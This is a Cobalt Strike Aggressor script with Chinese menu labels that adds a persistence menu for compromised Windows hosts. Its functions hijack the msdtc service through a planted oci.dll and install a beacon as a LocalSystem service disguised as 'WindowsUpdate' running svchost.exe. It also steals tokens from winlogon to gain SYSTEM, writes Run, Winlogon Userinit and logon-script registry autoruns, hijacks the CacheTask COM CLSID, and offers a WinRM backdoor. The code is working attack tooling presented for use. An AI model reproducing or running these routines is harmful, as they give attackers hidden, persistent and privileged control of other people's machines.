sub do_msdtchijack{
    $dll = $3['file'];
    $name = split("\\\\", $dll);
    $dllname = $name[-1];
    $dllname_w = $3['file2']."\\\\oci.dll";
    foreach $id ($bid){
        if(-isadmin $id){
            btask($id, "配置msdtc dll劫持");
            bshell($id, "sc stop msdtc");
            bshell($id, "del C:\\Windows\\System32\\oci.dll /F");
            bupload($id, $dll);
            bmv($id, $dllname, $dllname_w);
            bshell($id, "sc config msdtc start= auto");
            bshell($id, "sc config msdtc obj= LocalSystem");
            bshell($id, "sc start msdtc");
        }else{
            btask($id, "不是Administrator权限");
        }
    }
}

sub do_servicerun{
    $exename = $3["exename"];
    $data = artifact_payload("$3['listener']", "svcexe", "$3['arch']");
    $handle = openf(">".script_resource("tmp/".$exename));
    writeb($handle, $data);
    close($handle);
    btask($3["bid"], "生成服务马，Listener:$3['listener'] 位数:$3['arch'] 保存名称:$exename");
    bupload!($3["bid"], script_resource("tmp/".$exename));
    bmv($3['bid'], $exename, $3["uploadoutpath"].$exename);
    btask($3["bid"], "上传到$3['uploadoutpath']");
    $command = "sc create WindowsUpdate binPath= ".$3['uploadoutpath'].$exename." start= auto obj= LocalSystem DisplayName= windowsupdate";
    btask($3["bid"], "run $command");
    bshell($3["bid"],  $command);
    btask($3["bid"], "Query WindowsUpdate Service");
    bshell($3["bid"], "sc qc WindowsUpdate");
    btask($3["bid"], "Run WindowsUpdate Service");
    bshell($3["bid"], "sc start WindowsUpdate");
}

sub do_tokenrun{
    foreach $id ($bid){
        bexecute_assembly($id, script_resource("bin/systemcmd.exe"), "$3['ProcessID'] $3['ExecutePath']");
    }

}
sub do_tokendown{
    foreach $id ($bid){
        if(-is64 $id)
        {
            bdllspawn($id, script_resource("bin/SelectMyParent.x64.dll"), "$3['ProcessID'] $3['ExecutePath']","SelectMyParent", 5000, false);
        } else {
            bdllspawn($id, script_resource("bin/SelectMyParent.dll"), "$3['ProcessID'] $3['ExecutePath']", "SelectMyParent", 5000, false);
        }
    }
}


sub dialog_service{
    foreach $id ($bid){
        $dialog = dialog("ServiceRunBeacon", %(uploadoutpath => "C:\\Windows\\Temp\\", arch => barch($id) ,exename => "svchost.exe", servicename => "WindowsUpdate", bid => $id), &do_servicerun);
        dialog_description($dialog, "生成服务马上传执行，进行权限维持");
        drow_text($dialog, "arch", "arch:");
        drow_text($dialog, "uploadoutpath", "uploadoutpath:");
        drow_text($dialog, "servicename",  "servicename:");
        drow_text($dialog, "exename", "outputexename:");
        drow_listener($dialog, "listener", "Listener: ");
        dbutton_action($dialog, "run");
        dialog_show($dialog);
    }

}


sub dialog_msdtc{
    $dialog = dialog("msdtc DLL hijack config", %(file => "",file2 => "C:\\Windows\\System32"), &do_msdtchijack);
    dialog_description($dialog, "msdtc DLL劫持");
    drow_file($dialog, "file", "DLL Path:");
    drow_text($dialog, "file2", "RHOST Path:");
    dbutton_action($dialog, "RUN");
    dialog_show($dialog);
}
sub dialog_tokenup{
    $dialog = dialog("tokenrun", %(bid => $bid, ProcessID => "winlogon", ExecutePath => "C:\\Windows\\System32\\cmd.exe"), &do_tokenrun);
    dialog_description($dialog, "<ProcessID> <ExecutePath> 如果进程的权限是SYSTEM,提权到SYSTEM杀毒会杀");
    drow_text($dialog, "ProcessID","PID:");
    drow_text($dialog, "ExecutePath", "executepath:");
    dbutton_action($dialog, "Run");
    dialog_show($dialog);
}
sub dialog_tokendown{
    $dialog = dialog("tokendown", %(bid => $bid, Process => "winlogon", ExecutePath => "C:\\Windows\\System32\\cmd.exe"), &do_tokendown);
    dialog_description($dialog, "<ProcessID> <ExecutePath> ");
    drow_text($dialog, "ProcessID","PID:");
    drow_text($dialog, "ExecutePath", "executepath:");
    dbutton_action($dialog, "Run");
    dialog_show($dialog);
}
sub InstallAutoRun{
    local('$Prefix $File $Key $Item $Reg');
    $Prefix = "\\Software\\Microsoft\\Windows\\CurrentVersion\\";
    $File = replace($3['CallBackFile'], "\"", "");
    $Key = "\"".$3['RegKey'];
    $Item = $3['RegItem']."\"";
    if($3['RegItem'] eq "Winlogon"){
        $Prefix = replace($Prefix,'Windows',"Windows NT");
        $Reg = $Key.$Prefix.$Item;
        bshell($bid,"reg add  $+ $Reg /v Userinit /t REG_SZ /d \" C:\\Windows\\system32\\userinit.exe, $+ $File \" /f ");
    }
    else if($3['RegItem'] eq "Logon Scripts"){
        bshell($bid,"reg add  \"HKCU\\Environment\" /v UserInitMprLogonScript /t REG_SZ /d \" $+ $File \" /f ");
    }
    else{
        $Reg = $Key.$Prefix.$Item;
        bshell($bid,"reg add  $+ $Reg /f");
        bshell($bid,"reg add  $+ $Reg /v Svchost /t REG_SZ /d \" $+ $File \" /f ");
    }
}
sub CacheTaskExec{
    btask($3['bid'], "CacheTask任务计划COM接口DLL劫持");
    $dllname = split("\\\\", $3['dllpath'])[-1];
    bupload!($3['bid'], $3['dllpath']);
    bmv!($3['bid'], $dllname, $3['uploadpath']);
    bshell!($3['bid'], "reg add \"HKCU\\Software\\Classes\\CLSID\\{0358B920-0AC7-461F-98F4-58E32CD89148}\\InProcServer32\" /ve /t REG_SZ /d $3['uploadpath']");
    bshell!($3['bid'], "reg add \"HKCU\\Software\\Classes\\CLSID\\{0358B920-0AC7-461F-98F4-58E32CD89148}\\InProcServer32\" /v ThreadingModel /t REG_SZ /d Both")
}

sub CacheTask{
    foreach $id ($bid){
        $dialog = dialog("CacheTask", %(uploadpath => "C:\\Windows\\Temp\\test.dll", bid => $id), &CacheTaskExec);
        dialog_description($dialog, "CacheTask任务计划COM接口DLL劫持,适用系统:Windows 10/Windows Server 2012或以上");
        drow_text($dialog, "uploadpath", "uploadpath:");
        drow_file($dialog, "dllpath", "dllpath:");
        dbutton_action($dialog, "run");
        dialog_show($dialog);
    }
}





menu "权限维持"{
    item "注册表自启"{
        if (!-isadmin $1['@']){
            show_error("当前 Session 非管理员权限！!");
        }
        else{
            $bid = $1['@'];
            $Dialog = dialog("Auto Run",%(RegKey => "HKLM", RegItem => "Run", CallBackFile => "C:\\Windows\\system32\\cmd.exe /c start",bid => $bid),&InstallAutoRun);
            dialog_description($Dialog, "注册表添加启动启动项，如果选择RunOnce，您将以管理员权限返回。");
            drow_combobox($Dialog, "RegKey", "Key: ", @("HKLM", "HKCU"));
            drow_combobox($Dialog, "RegItem", "RegItem: ", @("Run", "RunOnce", "RunOnceEx", "Winlogon", "Logon Scripts"));
            drow_text($Dialog, "CallBackFile", "CallBackFile: ");
            dbutton_action($Dialog, "Reg");
            dialog_show($Dialog);
        }
    }
    item "CacheTask 任务计划 COM 接口劫持"{
        CacheTask($bid);
    }
    item "&cs服务马"{
            $bid = $1;
            dialog_service($bid);
        }
    item "&winrm后门"{
            $bid = $1;
            winrm_config($bid);
        }

    item "&msdtc DLL劫持"{
            $bid = $1;
            dialog_msdtc($bid);
        }
    item "&令牌提权"{
            $bid = $1;
            dialog_tokenup($bid);
        }
    item "&令牌降权"{
            $bid = $1;
            dialog_tokendown($bid);
        }
    
}